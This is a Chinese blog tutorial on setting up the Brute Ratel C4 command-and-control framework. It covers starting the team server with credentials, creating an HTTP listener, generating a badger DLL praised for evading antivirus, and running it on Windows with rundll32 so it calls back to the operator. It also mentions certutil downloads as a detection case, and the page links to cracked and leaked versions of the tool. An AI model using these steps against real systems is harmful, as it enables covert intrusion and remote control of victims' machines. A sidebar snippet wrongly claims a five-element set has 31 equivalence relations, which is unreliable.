BRC4工具1.2.2入门教程学习

已于 2022-09-21 17:05:21 修改
阅读量3.4k 收藏 6
点赞数 2
文章标签: 学习 服务器 linux web安全 系统安全
于 2022-09-21 11:45:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60717291/article/details/126969158
版权

以下文章参考利刃信安公众号

BRC4 后渗透工具集是由Chetan Nayak(Mandiant和Crowdstrike的前红队成员)开发的攻击模拟和后利用工具包,于2020年发布。后利用工具包是一个可定制的命令和控制框架,为用户提供诸如(但不限于):将shellcode注入进程、执行脚本执行和编写C2通道(如Slack、Microsoft团队)。

许多红队和对手在取得立足点后首先执行的技术动作之一是下载其他工具。许多现代安全工具能够使用无头浏览器(headless browser)之类的工具轻松检测到攻击者。但是,蓝队有时可能会被忽视的一种攻击方法是利用系统上已经存在的现有二进制文件(LOLBins)。该方法最流行工具之一是certutil,它是Windows操作系统上的命令行程序,用作证书服务的一部分。它可用于配置证书服务、验证证书以及更多与证书相关的活动。CertUtil中的一个命令参数——urlcache,可用于执行URL缓存管理操作——攻击者已经意识到他们可以使用该工具来下载恶意文件,但是如何检测呢?

检测恶意certutil活动的一种简单方法是通过CertUtil.exe的“urlcache”参数查找正在启动下载的文件。CertUtil通常不用于从Web下载可执行文件或文件,因此当它从互联网下载文件时应被视为可疑活动。

Kali 下打开此文件文件(注意:我这里之前试过2021版的kali设置监听就是不显示,本人比较菜不知道什么原因)下载的是2022.3最新版的kali就能够很流畅的使用。

在这里插入图片描述
首先,第一步,先给文件执行权限

需要运行哪个就设置哪个文件的相关权限。为了省事,我直接全部都给777
​​​​在这里插入图片描述

正常安全起见,也为了运行稳妥,先使用官方脚本执行安装必要组件和生成证书。在adhoc_scripts目录下运行,生成证书(本人比较懒,这一步我没有生成,我看到本身文件就有相关证书)
./genssl.sh
./install.sh

​​​​​​​sudo apt-get install libqt5webenginewidgets5 libqt5websockets5
sudo apt-get install nasm mingw-w64

下一步运行服务端(跟cs方式类似)
./brute-ratel-linx64 -ratel -a admin -p password@123 -h 172.16.208.131:8443 -sc cert.pem -sk key.pem

-a 用户名

-h本机的ip地址

-sc和-sk都是加认证方式的
在这里插入图片描述
下一步运行客户端进行连接
在这里插入图片描述
在这里插入图片描述
进入后点击添加Add http监听
在这里插入图片描述
配置相关的监听ip和url信息,以及上线系统
在这里插入图片描述
看到添加后,右击进行相关的
在这里插入图片描述
生成dll文件,并进行利用
在这里插入图片描述
默认dll文件免杀还可以
https://www.virustotal.com/gui/file/c48ac509d3dd6d963c0e2f9d112f395f9a4d86ccab7e39cfd8267015104a44d8
在这里插入图片描述
将文件放到windows端,运行命令进行上线
rundll32 badger_x64.dll,main

#设置以下延时
sleep 0
在这里插入图片描述
简单的入门操作到此结束,其余功能需要师傅们自行挖掘啦

写这篇文章的目的是为了记录一下笔记,仅此而已

拾柒247
关注
BRC20 技术分析
JavaPub
01-06 755
如果你看一些区块链的新闻,你一定知道什么是铭文,或者铭文怎么玩:这都是一些官方解答,不过也算通俗易懂在2023年年初及更早,有一些开发者开始对BTC生态进行探索,希望在BTC上发行资产,部署应用,Ordinals协议就是其中一个探索者,协议允许用户在BTC上实现图像、文字、音频等数据的上传,而这个过程称之为“铭刻”。Ordinal一开始被早期参与者应用于BTC NFT的创建,而在今年3月,有开发者也开始利用类似的技术希望在BTC上设计出ERC-20标准的协议。
Brute Ratel C4红队框架 brc4 1
2401_84281588的博客
04-28 788
将刚刚的破解文件到brc4根目录 并选择替换 将原来的文件替换掉执行一下命令看看是否破解成功,如果能正常启动就说明破解成功了,并且还可以连接没破解成功它会提示 Enter activation key: 或者 License is invalid or expired接下来我们结束服务,进入adhoc_scripts目录下运行,生成证书ps:此处生成证书可以跳过然后挨个执行执行genssl.sh时 需要自定义这些。
Brute Ratel C4红队框架 brc4 1.2.2入门使用教程(注册机使用)
m0_55751267的博客
05-13 6045
目前brc4貌似越来越火,相比之下cs用的越来越少了,但是不管是外网还是国内,关于brc4的在野破解版1.2.2的中文教程没有多少,虽然他和cs相似。
Brute Ratel C4红队框架 远控工具BRC4 1.4.5版本分享——附简单使用教程
最新发布
棉花糖的博客
07-01 1376
本文提供的BRC4 1.4.5由41group泄露,棉花糖未参与制作,使用此工具需遵守法律法规,一切后果由使用者本人承担。
Brute Ratel C4红队框架 brc4 1(1)
m0_57472099的博客
05-16 689
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
网络安全最全Brute Ratel C4红队框架 brc4 1(3),重难点整理
2401_84240189的博客
05-14 979
此处能添加payload配置 修改payload配置 删除payload配置 ,然后根据你选择的不同配置文件,生成该监听器的后门,此处有DOH (DNS over HTTPS),HTTP/HTTPS,TCP,SMB 可以选择,详情还是请参考官方文档,其中http/doh 大部分和原先配置相同,要注意的是tcp和smb,并且它可以和下一个选项 PsExec Config 可以联动,这可以用于多级网络反弹shell搭建隧道,当前多级网络环境我电脑上没有,拿到了之后会试试看。薪资区间6k-15k。
Brute Ratel C4红队框架 brc4 1,2024年网络安全开发陷入饱和,
m0_60666452的博客
04-07 877
​。
brc global standard food issue 4 - checklist
01-01
俗话说国以民为本,民以食为天,食品的生产、安全、质量均需要相应的食品资料知识累积与...该文档为brc global standard food issue 4 - checklist,是一份很不错的参考资料,具有较高参考价值,感兴趣的可以下载看看
matlab有些代码不运行-brc-slurm:这是伯克利研究计算集群的入门指南
05-23
这是伯克利研究计算集群的入门指南 在登录 ssh username@hpc.brc.berkeley.edu 工作的地方 /global/home/username限制为10 GB /global/scratch/具有无限存储空间 传输资料 # sending to the server scp (-r) local_...
Sony出新款BRC-Z700高清CMOS彩色摄像机
11-29
BRC-Z700搭载了3片1/4英寸的晶锐ClearVid CMOS传感器,每片传感器的有效像素高达1,000,000,这使得它在低光照环境下依然能保持高清晰度和高灵敏度。同时,它能够同时输出高清和标清视频信号,适应不同场合的需求。 ...
汇编语言入门教程
12-24
通过本教程,你不仅学习了如何安装和配置TASM5.0,还了解了其工具链的基本功能。汇编语言的学习之旅由此开启,掌握了TASM5.0的使用,你将能够在实际项目中实现对硬件的精确控制,提高代码的执行效率。继续深入探索,...
brc4 1.2.2生成exe无法回连解决方法
qq_54030686的博客
03-05 294
通过将bin转换为exe进行执行
利用自定义堆栈进行 Shellcode 开发
2301_77498991的博客
04-12 541
最近学习了下 BRC4 作者1月发表的博客 Hiding In PlainSight - Indirect Syscall is Dead!
2024HVV | 红队最常用的三大工具(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
02-17 2190
检测Metasploit活动的一个简便的好方法是查找包含与Metasploit的PsExec工具使用的模式名称一致的服务安装,同时在“Windows”目录中查找具有相同名称的二进制文件。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Brute Ratel C4 Badger分析实战与检测
pandazhengzheng的博客
02-05 1310
Brute Ratel C4 Badger分析实战与检测
【网络安全】红队常用工具大揭秘:安全渗透的三大神器
A1_3_9_7的博客
02-25 886
有人说,历史就像任人打扮的小姑娘,每次表演都唱同样的歌。网络安全也不能免俗,红队工具似乎总是能逃避检测,给蓝队制造麻烦。造成这种局面原因有很多,但有一点是决定性的,那就是:红队只需要做对一次,而蓝队每次都需要做对。蓝队通常很难检测到红队的工具,这迫使蓝队需要与威胁狩猎团队坐下来共同研究如何查找和检测红队最常使用的工具——例如Cobalt Strike、Brute Ratel、Meterpreter和PowerShell Empire。
windos工具和一些域渗透工具
2201_75378806的博客
03-27 2105
RTF是一种文本文件格式,旨在存储文本文档的格式化信息,例如字体、颜色和样式,而无需包含实际的二进制图像或多媒体数据。
DARPA加大拓扑量子投资!联合微软开发公用事业规模量子计算机
Qforepost的博客
02-26 564
微软认为,DARPA决定扩大对微软Azure量子的投资,是对具有挑战性但前景广阔的拓扑量子技术路线的信任,也是对微软设计和构建规模量子超级计算机实力的认可。微软预计,用拓扑量子比特构建的计算机将扩展到能解决传统计算机无法解决的过于复杂的重大商业问题的水平,例如化学和材料科学领域的问题。具有这种能力的量子计算机每万亿次操作最多只会产生一个错误。微软Azure量子团队已经取得的突破,以及硬件和软件设计、采购材料计划和详细的风险管理策略,有助于加大DARPA 的支持力度,以继续评估微软构建量子计算机的研究实力。
在离散数学中,集合A为{1,2,3,4,5}它有多少个等价关系
05-21
在集合A={1,2,3,4,5}中,定义一个关系R为等价关系,必须满足以下三条性质: 1. 自反性:对于任意的a∈A,都有aRa; 2. 对称性:对于任意的a,b∈A,如果aRb,则bRa; 3. 传递性:对于任意的a,b,c∈A,如果aRb且bRc,则aRc。 根据等价关系的定义,我们知道等价关系将集合A划分为若干个等价类,即每个等价类由满足以下条件的元素组成: 1. 同属于A; 2. 对于任意的a,b∈A,有a和b在同一个等价类中当且仅当aRb。 因此,我们可以通过寻找等价类的数量,来确定等价关系的数量。 在集合A中,可以发现有如下等价类: 1. {1} 2. {2} 3. {3} 4. {4} 5. {5} 6. {1,2} 7. {1,3} 8. {1,4} 9. {1,5} 10. {2,3} 11. {2,4} 12. {2,5} 13. {3,4} 14. {3,5} 15. {4,5} 16. {1,2,3} 17. {1,2,4} 18. {1,2,5} 19. {1,3,4} 20. {1,3,5} 21. {1,4,5} 22. {2,3,4} 23. {2,3,5} 24. {2,4,5} 25. {3,4,5} 26. {1,2,3,4} 27. {1,2,3,5} 28. {1,2,4,5} 29. {1,3,4,5} 30. {2,3,4,5} 31. {1,2,3,4,5} 因此,集合A中共有31个等价关系。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

拾柒247

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值